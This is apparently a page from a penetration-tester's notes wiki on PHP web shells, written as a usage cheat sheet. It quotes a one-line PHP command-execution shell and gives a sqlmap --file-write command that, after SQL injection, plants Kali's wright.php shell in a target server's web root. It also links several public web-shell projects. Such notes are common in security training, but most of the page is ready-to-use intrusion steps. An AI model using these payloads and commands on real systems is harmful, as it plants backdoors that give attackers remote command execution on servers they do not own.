search
githubEdit

web-shells

wright.php (Kali) — More stable than a minimal ?cmd= PHP shell. Use when you can upload a single file (e.g. sqlmap --file-write after SQLi).

  • Location: /usr/share/webshells/php/wright.php

  • Usage: Upload to web root (e.g. sb.php), then open in browser. Often avoids "Cannot execute blank command" and gives cleaner output than <?php system($_GET["cmd"]); ?>.

  • With sqlmap: sqlmap -r req.req --file-write="/usr/share/webshells/php/wright.php" --file-dest="/var/www/html/sb.php" --batch

SecLists

  • https://github.com/danielmiessler/SecLists/tree/master/Web-Shells

White Winter Wolf Web Shell

  • https://github.com/WhiteWinterWolf/wwwolf-php-webshell

PHP Bash

  • https://github.com/Arrexel/phpbash.git

PHP - Powny-Shell

  • https://github.com/flozz/p0wny-shell

PreviousShellsNextPHP Web Shells

Last updated